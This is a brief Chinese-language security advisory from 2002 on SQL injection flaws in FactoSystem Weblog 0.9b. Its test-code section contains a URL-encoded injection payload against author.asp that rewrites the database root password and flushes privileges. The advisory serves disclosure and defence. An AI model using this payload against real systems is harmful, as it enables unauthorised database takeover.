FactoSystem Weblog存在多个SQL插入漏洞发布时间:2002-09-10 更新时间:2002-09-10 严重程度:高 威胁程度:控制应用程序系统 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5600 受影响系统 FactoSystem FactoSystem Weblog 0.9 b详细描述 FactoSystem Weblog是免费开放源代码WEB日志和管理系统。 FactoSystem没有很好的检查来自外来请求中的特殊字符,远程攻击者可以提交包含特殊编码的字符和SQL命令,导致改变系统SQL查询,而可对数据库进行操作。 测试代码 http://www.example.com/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B-- 解决方案 无 相关信息 Matthew Murphy <mattmurphy@kc.rr.com>. 参考:http://online.securityfocus.com/archive/1/290021 相关主页:http://facto.sourceforge.net/index.shtml |
